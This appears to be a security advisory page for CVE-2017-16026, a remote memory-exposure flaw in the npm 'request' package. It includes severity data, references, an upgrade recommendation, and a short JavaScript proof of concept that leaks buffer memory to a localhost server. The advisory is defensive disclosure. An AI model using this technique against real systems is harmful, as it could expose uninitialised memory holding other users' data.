GHSA-7xfp-9c55-5vqj
Suggest an improvement- Source
- https://github.com/advisories/GHSA-7xfp-9c55-5vqj
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-7xfp-9c55-5vqj/GHSA-7xfp-9c55-5vqj.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-7xfp-9c55-5vqj
- Aliases
- Published
- 2018-11-09T17:44:01Z
- Modified
- 2023-11-08T03:59:00.437371Z
- Severity
-
- 5.9 (Medium) CVSS_V3 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
- Summary
- Remote Memory Exposure in request
- Details
-
Affected versions of
requestwill disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type ofbodyisnumber, then a buffer of that size will be allocated and sent to the remote server as the body.Proof of Concept
var request = require('request'); var http = require('http'); var serveFunction = function (req, res){ req.on('data', function (data) { console.log(data) }); res.end(); }; var server = http.createServer(serveFunction); server.listen(8000); request({ method: "POST", uri: 'http://localhost:8000', multipart: [{body:500}] },function(err,res,body){});Recommendation
Update to version 2.68.0 or later
- Database specific
{ "nvd_published_at": null, "cwe_ids": [ "CWE-201" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:23:42Z" }- References
-
- https://nvd.nist.gov/vuln/detail/CVE-2017-16026
- https://github.com/request/request/issues/1904
- https://github.com/request/request/pull/2018
- https://github.com/request/request/pull/2022
- https://github.com/request/request/commit/29d81814bc16bc79cb112b4face8be6fc00061dd
- https://github.com/request/request
Affected packages
npm / request
Package
- Name
- request
- View open source insights on deps.dev
- Purl
- pkg:npm/request
npm / request
Package
- Name
- request
- View open source insights on deps.dev
- Purl
- pkg:npm/request